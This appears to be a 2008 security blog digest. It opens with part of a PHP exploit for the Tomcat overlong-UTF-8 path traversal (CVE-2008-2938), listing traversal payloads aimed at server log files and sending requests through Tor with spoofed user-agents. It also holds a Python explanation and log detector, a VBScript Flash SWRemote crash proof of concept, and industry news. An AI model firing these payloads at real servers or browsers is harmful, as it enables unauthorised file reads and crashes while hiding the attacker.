"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/httpd/error_log",
"%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/apache/logs/access.log",
"%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/etc/httpd/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/access.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/www/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/usr/local/apache/logs/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/apache/error.log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/access_log",
"%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/var/log/error_log"
);

function wrap($url) {

    // Randomised User-Agent string
    $ua = array('Mozilla','Opera','Microsoft Internet Explorer','ia_archiver');
    $op = array('Windows','Windows XP','Linux','Windows NT','Windows 2000','OSX');
    $agent = $ua[rand(0,3)].'/'.rand(1,8).'.'.rand(0,9).' ('.$op[rand(0,5)].' '.rand(1,7).'.'.rand(0,9).'; en-US;)';

    // proxy: requests go through a local proxy listening on 127.0.0.1:8118
    $tor = '127.0.0.1:8118';
    $timeout = 300;
    $ack = curl_init();
    curl_setopt($ack, CURLOPT_PROXY, $tor);
    curl_setopt($ack, CURLOPT_URL, $url);
    curl_setopt($ack, CURLOPT_HEADER, 1);
    curl_setopt($ack, CURLOPT_USERAGENT, $agent);
    curl_setopt($ack, CURLOPT_RETURNTRANSFER, 1);
    curl_setopt($ack, CURLOPT_FOLLOWLOCATION, 1);
    curl_setopt($ack, CURLOPT_TIMEOUT, $timeout);

    $syn = curl_exec($ack);
    $info = curl_getinfo($ack);
    curl_close($ack);

    // Return the response (headers included) on HTTP 200, otherwise the status code
    if ($info['http_code'] == 200) {
        return $syn;
    } else {
        return "Fail! :".$info['http_code']."\r\n";
    }
}


for ($i = 0; $i < count($dir); $i++) {
    echo wrap($url.":8080/".$dir[$i]);
}

?>
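The mechanism behind this bug class, as an added example that is not part of the original post: "%c0%ae" is an overlong (non-shortest-form) UTF-8 encoding of ".", so a traversal check that runs on the raw bytes sees nothing, while a lenient decoder later turns it into "../". The model below contrasts a lenient decoder with a strict one and scans constructed access-log lines for the pattern; the web root, log lines and decoder are assumptions for the demonstration, not Tomcat's code.

```python
"""Overlong UTF-8 in percent-encoded URIs: why check-then-decode fails,
and how to spot the pattern in access logs. Added example; constructed."""
import posixpath
import re
from typing import Callable, List, Optional, Tuple
from urllib.parse import unquote_to_bytes

WEBROOT = "/opt/tomcat/webapps/ROOT"  # constructed web root, not a real install


def lenient_utf8_decode(data: bytes) -> str:
    """Deliberately flawed decoder that accepts overlong two-byte forms.

    0xC0 0xAE is a non-shortest-form encoding of '.'; a correct decoder must
    reject it, but this one maps it to '.' to model the vulnerable behaviour.
    """
    out = []
    i = 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            # 110xxxxx 10yyyyyy -> code point, with no shortest-form check
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))
            i += 2
        else:
            out.append(chr(b))  # ASCII (stray bytes as Latin-1); enough for the demo
            i += 1
    return "".join(out)


def strict_utf8_decode(data: bytes) -> str:
    """Python's built-in decoder refuses overlong sequences (UnicodeDecodeError)."""
    return data.decode("utf-8")


def naive_traversal_check(raw: bytes) -> bool:
    """Check run on percent-decoded but not yet UTF-8-decoded bytes: it only
    sees literal '..' segments, so b'\\xc0\\xae\\xc0\\xae' passes."""
    return all(seg != b".." for seg in raw.split(b"/"))


def map_uri_to_file(encoded_uri: str, decoder: Callable[[bytes], str]) -> Optional[str]:
    """Model of request mapping: percent-decode, check for '..', then decode
    the bytes to text and join to the web root. Returns None when rejected."""
    raw = unquote_to_bytes(encoded_uri)
    if not naive_traversal_check(raw):
        return None
    try:
        text = decoder(raw)
    except UnicodeDecodeError:
        return None  # strict decoding rejects the overlong form outright
    return posixpath.normpath(WEBROOT + "/" + text)


def escapes_webroot(resolved: Optional[str]) -> bool:
    """True when a resolved path lies outside WEBROOT."""
    if resolved is None:
        return False
    return resolved != WEBROOT and not resolved.startswith(WEBROOT + "/")


# Detection: an overlong two-byte sequence is %C0xx or %C1xx followed by a
# continuation byte (%80-%BF). Valid multibyte escapes such as %C3%A9 do not match.
OVERLONG_RE = re.compile(r"%c[01]%[89ab][0-9a-f]", re.IGNORECASE)

# Constructed Common Log Format lines (not real traffic).
SAMPLE_LOG = """\
192.0.2.10 - - [13/Aug/2008:12:00:01 +0000] "GET /index.jsp HTTP/1.1" 200 1024
192.0.2.11 - - [13/Aug/2008:12:00:05 +0000] "GET /%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd HTTP/1.1" 200 2048
192.0.2.12 - - [13/Aug/2008:12:00:09 +0000] "GET /docs/%C3%A9.html HTTP/1.1" 200 512
192.0.2.13 - - [13/Aug/2008:12:00:12 +0000] "GET /%C0%AE%C0%AE/WEB-INF/web.xml HTTP/1.1" 404 300
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)


def find_overlong_requests(log_text: str) -> List[Tuple[str, str, int]]:
    """Return (client ip, request uri, status) for requests carrying overlong
    UTF-8 escapes. A 200 on such a request deserves a closer look."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if m and OVERLONG_RE.search(m.group("uri")):
            hits.append((m.group("ip"), m.group("uri"), int(m.group("status"))))
    return hits


if __name__ == "__main__":
    probe = "%c0%ae%c0%ae/%c0%ae%c0%ae/etc/passwd"
    print("lenient :", map_uri_to_file(probe, lenient_utf8_decode))
    print("strict  :", map_uri_to_file(probe, strict_utf8_decode))
    for hit in find_overlong_requests(SAMPLE_LOG):
        print("flagged :", hit)
```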


[1] http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2938

Flash, Fuzzing and Girls. - 0x000000 Security

August 13, 2008 09:30 AM
A short update of developments this week. Let's start with how to impress girls.

I just read some slides from Blackhat, and one that caught my interest was the slides from Mark Dowd and Alexander Sotirov[1]. I guess I don't have to explain who those gentlemen are. Right, now what caught my eye was a mention of the use of verbatim dll pointers in an object. Usually, with ActiveX we load the classid followed by the id that links to the dll. In this case, they just load the dll into the object and that raises no warning in the Internet Zone. Clearly this is a very notable find and certainly material to impress girls with, because I never assumed that that was possible. It shows again that a solution is always in its environment. It's simple, but brilliant.

Loading verbatim dll's:

<object classid="ControleName.dll#NameSpace.ClassName"></object>

That is only one tiny part of the paper, go read it if you are interested. It is a real eyeopener. It covers:

- "Stack Spraying", an alternative method to heap spraying with some additional benefits
- Exploiting poor permissions, such as Java's RWX memory allocator, and
- Utilizing .NET binaries to map data at an attacker-controlled memory location.

Adobe fixes heap corruption.

Some time ago, I found that Flash9c.ocx was vulnerable to heap corruption, and that it's possible to overflow the SWRemote property inside the Flash9c.ocx interface with a very long string generated in VBScript. In my test case it ran for about 30 seconds before crashing and raising an exception; when trying to kill it, it could result in a full system freeze. After updating Flash, it seems Adobe fixed this silently in at least Flash9f.ocx. A real bummer for personal research. I cannot reproduce it anymore, because I did not make a copy of Flash9c.ocx for future research. Anyway, I learned to make copies now.


Interface IShockwaveFlash : IDispatch
Default Interface: True
Members : 93
Quality
ScaleMode
AlignMode
BackgroundColor
Movie
FrameNum
SetZoomRect
Zoom
Pan
GotoFrame
FrameLoaded
WMode
SAlign
Base
Scale
BGColor
Quality2
LoadMovie
TGotoFrame
TGotoLabel
TCurrentFrame
TCurrentLabel
TPlay
TStopPlay
SetVariable
GetVariable
TSetProperty
TGetProperty
TCallFrame
TCallLabel
TSetPropertyNum
TGetPropertyNum
TGetPropertyAsNumber
SWRemote
FlashVars
AllowScriptAccess
MovieData
ProfileAddress
ProfilePort
CallFunction
SetReturnValue
AllowNetworking
AllowFullScreen


SWRemote

The property SWRemote inside Flash9x.ocx interface obtains a string passed through the object:

Property Let SWRemote  As String


The proof of concept was:

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='foo'>
<param name="src" value="foo.swf">
</object>

<object classid='clsid:D27CDB6E-AE6D-11CF-96B8-444553540000' id='bar'>
<param name="src" value="foo.swf">
</object>

<script type='text/vbscript'>

long=String(100000000,"X")

foo.SWRemote=long
bar.SWRemote=long

</script>


Live trace:



Now the interesting thing about this is, I fuzzed all classes in that particular dll without regard to whether they were considered fuzzable or not. It turns out that in blackbox fuzzing you can find vulnerabilities that you would not find while fuzzing on assumptions, as COMRaider does for example. Secondly, I used two Flash objects, or two dll class calls. That made a difference in finding this vulnerability. HD Moore once said that you'll have to know what to fuzz for. This is true in some sense, because it speeds up your fuzzing. But the drawback is that you cannot encompass all possibilities and quirks. The very vulnerabilities you look for might not be reachable without hammering all classes whether they are fuzzable or not, because it turned out that this was certainly the case here.

[1] http://taossa.com/archive/bh08sotirovdowdslides.pdf

Application Security Vendors Counting their Millions - Jeremiah Grossman

August 13, 2008 01:43 AM
Software security sage Gary McGraw (CTO, Cigital) published his market research on what he believes are the 2007 revenue numbers for application security vendors. Speaking for myself, I can neither confirm nor deny the accuracy of this data, certainly when it comes to WhiteHat.

Fortify: $29.2 million
Coverity: $27.2 million
Klockwork: $26 million
Watchfire (IBM): $24.1 million
SPI Dynamics (HP): $22.3 million
Cenzic + Codenomicon + WhiteHat: $12.5 million
Ounce Labs: $9.5 million

$150.8 million total for the tools / SaaS market

“The source code analysis space is now larger than the black box testing tools space….”

Sort of, but more on that in a moment.

“Tools don't run themselves”

Ain’t that the truth.

“The hard-to-track software security services space checks in around $100-140 million in 2007, with growth just shy of 20% over 2006. Services can be divided into three tracks: training (around $7 million), risk assessment ($45-60 million) and penetration testing ($50-75 million).”

I’m not sure about the risk assessment number, but I’m thinking the estimates for training and penetration testing are probably orders of magnitude lower than they should be. The rates for larger players including IBM Global Services, Verizon, Symantec, Ernst & Young, PwC, and KPMG aren’t cheap. And to some extent neither are the smaller players such as Matasano, SecTheory, iSec, Leviathan, Denim Group, Foundstone, Gotham, NGSS, FishNet, Aspect, SANS, IOActive, Immunity, NTO, NGS, BlueInfy, Net-Square and dozens of other regional players. No wonder the overall market totals are tough to track, but each takes their piece of the pie.

I believe when it comes to the black-box testing of web applications, services are likely 5x larger than the tools industry – especially if you consider that few organizations these days haven’t had a professional vulnerability assessment (and it’s tough to capture international sales as well). The opposite is true for white-box testing, where tool purchases are way more common due to the costs of a line-by-line source code review by a consultant. Then we have WAF sales driven by VA sales, which makes sense because an organization typically must identify a need before they can justify the fix. The same was true of the network firewall, patch management, and A/V markets.

All in all, the trajectory for the entire web application security segment is going up, and fast. PCI-DSS 6.6 is certainly one stimulant, but so is all the web hacking going on these days. Great numbers Gary, thanks for sharing!

August 2008 Monthly Bulletin Release - The Microsoft Security Response Center (MSRC)

August 12, 2008 06:07 PM

Hello again! This is Tami Gallupe (MSRC Release Manager) and I want to let you know that we just posted our August 2008 Bulletins.  This month we released 11 bulletins, one new advisory and revised an existing advisory. We also revised four bulletins to update detection changes. Here is a brief overview of the bulletins and other content we released today.

 

You may notice that we removed one of the bulletins that we had mentioned in the “Advanced Notification Service” that we released last week. We did this prior to today’s bulletin release because of a last minute quality issue. Microsoft has heard from customers that the quality of updates is very important and, as part of the process at the Microsoft Security Response Center (MSRC), Microsoft tests these updates continuously until they are ready for distribution to customers through our regularly scheduled security bulletin release.

 

Bulletins:

·        MS08-041 – Vulnerability in the ActiveX Control for the Snapshot Viewer for Microsoft Access Could Allow Remote Code Execution (955617) – Critical

·        MS08-042 – Vulnerability in Microsoft Word Could Allow Remote Code Execution (955048) – Important

·        MS08-043 – Vulnerabilities in Microsoft Excel Could Allow Remote Code Execution (954066) – Critical

·        MS08-044 – Vulnerabilities in Microsoft Office Filters Could Allow Remote Code Execution (924090) – Critical

·        MS08-045 – Cumulative Security Update for Internet Explorer (953838) – Critical

·        MS08-046 – Vulnerability in Microsoft Windows Image Color Management System Could Allow Remote Code Execution (952954) – Critical

·        MS08-047 – Vulnerability in IPsec Policy Processing Could Allow Information Disclosure (953733) – Important

·        MS08-048 – Security Update for Outlook Express and Windows Mail (951066) – Important

·        MS08-049 – Vulnerabilities in Event System Could Allow Remote Code Execution (950974) – Important

·        MS08-050 – Vulnerability in Windows Messenger Could Allow Information Disclosure (955702) – Important

·        MS08-051 – Vulnerabilities in Microsoft PowerPoint Could Allow Remote Code Execution (949785) – Critical

 

We also revised the following bulletins to update detection changes:

·        MS08-022 – major revision, added XP SP3 detection

·        MS08-033 – major revision, added XP SP3 detection

·        MS07-047 – major revision, update detection

·        MS08-040 – minor revision, update detection

 

Advisories:

·        Release Advisory 955179

·        Revised Advisory 954960

 

You can also read about this month’s Security Vulnerability Research & Defense blog at http://blogs.technet.com/swi/.

 

And finally, I also want to highlight my favorite event of the release: the webcast that starts tomorrow (Wednesday, August 13th) at 11:00 AM PST.  To me this is a wonderful event that gives us a chance to hear from you, to take your questions and answer them live, on the air. Click here to register for TechNet Webcast: Information About Microsoft August Security Bulletins.   We look forward to hearing from you tomorrow.

 

Cheers!

  Tami

*This posting is provided "AS IS" with no warranties, and confers no rights.*

MIDP’s and MIDlets put tens of millions Nokia S40 phones in danger - SecuriTeam Blogs

August 12, 2008 02:29 PM

Polish security researcher Adam Gowdiak is the only person in the world (we really hope he is!) who knows the details of the recent J2ME vulnerabilities affecting Nokia mobile phones.

The research material includes information about a

reliable MIDP 2.0 privilege elevation technique for Nokia Series 40 devices

and a

Nokia specific exploitation technique leading to the remote and persistent deployment of a backdoor shell application into the target Nokia Series 40 phone

Mr. Gowdiak has tested 7 Nokia Series 40 models.

Needless to say, this information in the hands of bad guys is dangerous.

As for the affected devices: Nokia Series 40 phones shipped with 3rd Edition Feature Pack 2 and 3rd Edition are affected.


Teh skool - F-Secure Antivirus Research Weblog

August 12, 2008 01:00 PM
[image: lukkari] Summer is almost over and schools are restarting for our student readers.

Download a *free* school schedule and other mad props from our ABC pages. There's also a cool virus-themed game.

Take a deep breath. Next summer is coming soon.

 

On 12/08/08 At 01:47 PM

About the Java vulnerability on S40 phones - F-Secure Antivirus Research Weblog

August 12, 2008 11:30 AM
[image: s40 phone] There's been some media coverage on a recent vulnerability announcement. This is related to Java vulnerabilities affecting at least the Nokia S40 phone platform, and possibly other phone platforms based on a similar Java reference platform.

The vulnerability details have not been released, but if it works as advertised, this vulnerability could affect more than a hundred million mobile phones. This vulnerability is reported to allow an attacker to execute arbitrary code on target phones.

The S40 platform has never been targeted by a mobile phone virus or other malware. We're not expecting to see real-world attacks using this vulnerability in the near future either.

We're monitoring the situation.

On 12/08/08 At 12:09 PM

Risky Business #73 — PCI DSS and kiosk hacking 101 - Risky Business

August 11, 2008 07:00 PM

This week’s show is brought to you by Tenable Network Security and hosted, as always, by Vigabyte Virtual Hosting.

There’s no news segment in this week’s news section — Patrick Gray is on holiday in Japan, so this is a pre-recorded show. But it’s still a good one!

This week’s feature guest is New Zealand-based security researcher Paul Craig. He’s just launched iKAT, the Interactive Kiosk Attack Tool.

Ever wondered how to pwn one of those Internet kiosks in various lobbies and airports? Tune in to find out! Paul’s spent over a year working on iKAT and has just launched it at DEFCON.

This week’s sponsor interview is with Tenable Network Security’s Chief Security Officer Marcus Ranum. For those who haven’t worked in the security industry very long, Marcus is kind of a big deal(tm).

This week we’re talking to Marcus about the impact the Payment Card Industry Data Security Standard (PCI DSS) has had on industry practices.


CloudAV - SecuriTeam Blogs

August 11, 2008 06:13 PM

A few media sources seem to be picking up a press release from the University of Michigan.

http://www.ns.umich.edu/htdocs/releases/story.php?id=6666

This reports on “CloudAV,” a project and series of papers about having antivirus detection run “in the cloud” rather than on the PC.

http://www.eecs.umich.edu/fjgroup/cloudav/

As usual, there seems to be some misunderstanding about what is going on here. CloudAV is not really a new approach, it is simply the use of multiple scanners, which the AV research community has advocated for years. It’s like having a bunch of scanners installed on your desktop, or a system like Virustotal, with the exception that the scanners run on different computers so you get a bit of performance advantage (absent the bandwidth lag/drain for submitting files to multiple systems).


BlackHat encore - Chicago OWASP next week - Jeremiah Grossman

August 11, 2008 05:24 PM
Chapter leaders Cory Scott and Jason Witty were gracious enough to invite me to present at this month's OWASP Chicago meeting. It's always fun to visit a new chapter. I've been to about a dozen so far, meeting like-minded webappsec people from various parts of the country/world. This is also a good opportunity for those who missed Black Hat to see one of the presentations live rather than relying solely on the information in the slides.

August 21 - OWASP Chicago Chapter (6:00pm – 8:30pm)
6:00 Refreshments and Networking
6:15 Bad Cocktail: Spear Phishing + Application Hacks - Rohyt Belani, Managing Partner, Intrepidus Group
7:15 Get Rich or Die Trying - Making Money on The Web, The Black Hat Way - Jeremiah Grossman, Founder & CTO of Whitehat Security

Bank of America Plaza
540 W. Madison, Downtown Chicago, 23rd floor.

*Please RSVP to jason{AT}wittys.com by 8/19/2008 if you plan to attend. Your name will need to be entered into the building's security system in order to gain access to the meeting.*

Road Show - 3 Cities in 3 Days - Jeremiah Grossman

August 11, 2008 05:06 PM
For those interested in learning more about the WhiteHat Sentinel / F5 ASM integration we have a road show scheduled (If not, go ahead and stop reading now). We’re visiting Atlanta, New York, and Chicago next week. In each city presenting will be our CEO Stephanie Fohn sharing insights on the latest website vulnerability statistics, a guest customer from a financial institution sharing their experiences on “The Challenge of Managing Application Security in Today's Environment”, and myself paired with an F5 engineer performing live VA+WAF demos. A really nice lunch will be served on us and registration is free, space is limited though. Hope to see many of you there!

August 19 (Atlanta @ 11:30am – 1:30pm)
The Four Seasons Hotel
75 Fourteenth Street Atlanta, GA 30309
Guest Speaker: Allen Stone, Senior Security Specialist, E*TRADE Financial


August 20 (New York @ 11:30am – 1:30pm)
The Tribeca Grand Hotel
2 Avenue of the Americas
New York, NY 10013
Guest Speaker: Jim Routh, Chief Information Security Officer, DTCC


August 21 (Chicago @ 11:30am – 1:30pm)
The Peninsula Chicago Hotel
108 East Superior Street
Chicago, IL 60611
(312) 337-2888
Guest Speaker: Anna Sherony, Privacy and Information Protection Officer, Sammons Financial

Get Rich or Die Trying (BlackHat USA 2008) - Jeremiah Grossman

August 11, 2008 04:04 PM
Update 08.11.2008: Added a video interview of Trey and myself to the bottom of the post.

Our speaking slot was informally dubbed the “power hour” due to the number of stellar presentations all booked at the same time - many of which I would have loved to attend personally. Nate McFeters & Co. unveiled the details on their GIFAR research, Microsoft announced they’ll be revealing vulnerability details to certain vendors prior to public disclosure, Joanna Rutkowska on the Xen hypervisor, etc. And making matters just a little bit more interesting, we were generously given a larger ballroom. This was scary because with a speaking time near the end of the last day combined with top-notch competition, a sparsely attended room would have been entirely likely. So when the room filled to capacity, I’m guessing around 1,000 people (standing room only), Trey Ford and I were extremely ecstatic! Which reminds me, Trey Ford (Director of Solutions Architecture) pinch-hit for Arian Evans (Director of Operations) so he could focus more time on his presentation, “Encoded, Layered and Transcoded Syntax Attacks.”

The premise for the “Get Rich or Die Trying” presentation was looking forward at the next 3-5 years, considering that we’re probably going to see less fertile ground for XSS/SQLi/CSRF to be taken advantage of – that is, if the good guys do their job well. So the bad guys will likely focus more attention on business logic flaws, which QA overlooks, scanners can’t identify, IDS/IPS can’t defend, and more importantly issues potentially generating 4, 5, 6 or even figures a month in illicit revenue. In many ways though this is sort of like predicting the present, since just about every example we gave was grounded with a real-world public reference and backed by statistics. We also wanted this presentation to be very different from what most are used to at BlackHat, which tends to be deeply technical, hard to follow, and often dry. And while everyone in webappsec is transfixed on JavaScript malware issues, we chose another direction.

We designed a presentation meant to be a lot of fun, that taught things anyone could do, and perhaps by the end might have people questioning their ethics. Judging from much of the feedback I think we might have succeeded on the last point. :) RSnake was also a good sport when we ribbed him a little bit. For those interested in the slides, I quickly uploaded them to slideshare. The quality is decent (hard to see the references) and you can download the PDF. I’m working on slenderizing it now, so when I have it I’ll upload that as well, including the video when we get it.




Lastly thank you very much to everyone who came and supported us, it meant a lot.


Surf Jack. - 0x000000 Security

August 11, 2008 09:30 AM
I got into contact with Sandro from enablesecurity a couple of times before. But the last time I talked with him he gave a very interesting concept that I hadn't seen before. He called it: Surf Jacking, HTTPS will NOT save you[1]. Well, what can I say, given the DNS mayhem that is going on lately, this is another hot coal that should be understood by everyone in the security industry before attackers start to use it in the wild.

Watch the video by Sandro Gauci from enablesecurity demonstrating Surf Jack:


Surf Jacking Gmail demonstration from Sandro Gauci on Vimeo.

[1] http://enablesecurity.com/2008/08/11/surf-jack-https-will-not-save-you/

BlackHat Slides - The Art of Software Security Assessment

August 10, 2008 04:24 AM

Hi,

The link for the slides did not work in the last post, so for those interested - you can get the slides here.

Our Xen 0wning Trilogy Highlights - invisiblethings' blog

August 08, 2008 06:18 PM
Below you can find highlights of the three presentations, collectively referred to as "Xen 0wning Trilogy", that Alex, Rafal and I gave today at the Black Hat conference in Las Vegas.

Talk #1

1) Practical implementation of reliable and portable DMA attacks from Domain 0 to the Xen hypervisor memory.

2) Xen Loadable Modules :) A framework that allows loading arbitrary C code modules into the running Xen hypervisor. It uses the DMA attack from the previous point to get access to Xen memory.

3) Two implementations of Xen Hypervisor Rootkits. This was the first time that working hypervisor rootkits have been presented (note the distinction between hypervisor rootkit vs. virtualization based rootkits).

Talk #2

1) Discussed how Xen 3.3 makes use of the Intel VT-d technology to protect the hypervisor.

2) Then we discussed how to bypass such VT-d protection on certain motherboards, like e.g. Intel DQ35 board.

3) An extra bonus: our attack from the previous point also allows subverting the SMM handler and e.g. installing an SMM rootkit in the system.

4) Discussed other Xen security mechanisms like driver domains, stub domains, PV GRUB and also attempted to quickly compare the state of Xen security design with the Hyper-V and ESX hypervisors.

5) Showed an exploitable heap overflow bug in the Xen hypervisor. The bug was in the FLASK module -- the NSA implementation of Xen Security Modules. FLASK, however, is not turned on by default, so even though we showed how to successfully exploit this heap overflow (which results in an escape from an unprivileged domain directly to the hypervisor), this is not a bug that can be used to 0wn The Planet. It shows, however, what happens when people start adding more and more code into the hypervisor.

6) Introduced HyperGuard -- a project done in cooperation with Phoenix Technologies. HyperGuard is going to be an SMM-based integrity scanner for Xen-like hypervisors. With HyperGuard we take a different approach than other integrity scanners do -- rather than ensuring the correctness of the code and data of the hypervisor, which might be very tricky, we instead ensure there is no untrusted code in the hypervisor, which is a much simpler task.

Talk #3

1) Provided a detailed description of how to implement nested hardware-based virtualization on AMD-V and VT-x (a copy of the slides from my RSA speech in April).

2) Showed how to use this nested virtualization to implement Blue Pill Boot, which can be used to virtualize the system right from the boot stage. We mentioned that the best defense against this kind of system compromise is a trusted boot mechanism, either SRTM or DRTM, as implemented e.g. by Xen's tboot.

3) Consequently we showed Xen Blue Pill, which is able to move a running Xen system into a virtual machine on the fly. This, on the other hand, cannot be prevented by either the SRTM or DRTM technology. XBP is a good example that running a legitimate hypervisor doesn't always prevent bluepill-like malware from being installed in the system.

4) Finally, discussed XBP detection. First, we noted that all the "VMM detectors" proposed over the last years, which try to detect if there is a hypervisor running above, are useless in the case of a bluepilled Xen system. The only approach that could be used is direct timing analysis of the #VMEXIT times in order to distinguish between the native Xen case and the bluepilled Xen case. We noted, however, that direct timing analysis will not observe any differences when run from PV domains on AMD processors, and that it will observe little difference when run from HVM domains (7k vs. 5k cycles). The detection is easier on Intel processors, because of the unconditional #VMEXIT that we cannot get rid of.

All the three talks can be found here.

Malware du Jour - SecuriTeam Blogs

August 08, 2008 03:48 PM

ESET, the anti-malware company for which I work, has just published its half-yearly report on global malware trends, based on data generated by automatic threat-tracking systems. Few people who read this blog will be interested in the marketing aspects of that document, but I thought you might find some of the conclusions interesting.

  • We’ve noticed (actually over far longer than six months) a huge number of detections of malware that uses the Windows AutoRun facility to self-install from removable media (USB flash drives, CDs and so on). It may seem slightly surprising that other vendors haven’t flagged this trend particularly, but it doesn’t mean they don’t detect the same things: it’s just that we have a heuristic that highlights that trend. In the same way, another vendor has a detection that highlights a high proportion of iFrame exploits. We’re very aware of the ever-increasing volume of web-hosted threats, but we don’t have an exact equivalent to that heuristic, so that particular trend isn’t so obvious from our (prevalence-based) figures.
  • Possibly Unwanted Applications (PUAs) and other adware and spyware detections occupy several places in our top ten. That’s not a complete novelty, but the impact of the Virtumonde Trojan in particular is dramatic. Virtumonde is a real pain: its authors work hard at hiding it from specific anti-malware products, and it can be grim trying to remove it from a system when it’s in memory. Leaving it there isn’t much of an option, either: it has a habit of pounding an infected system with so much advertising that it becomes unusable.
  • There’s been a dramatic decline in the use of email to distribute new malicious attachments: of course, it remains a prime vector for the dissemination of malicious URLs. What interested me was the sheer volume of antique mass mailers like Netsky.Q, but my guess is that these are mostly generated by unprotected home machines running obsolescent Windows versions.
  • Password stealing attacks on online gamers and haunters of metaverses like Second Life have been around for a while, too, but they’ve overtaken AutoRun exploits in the “top ten” over the past few months. And that’s not even taking into account other attacks like griefing and replicative “grey goo” style attacks.

David Harley
ESET Malware Intelligence Team
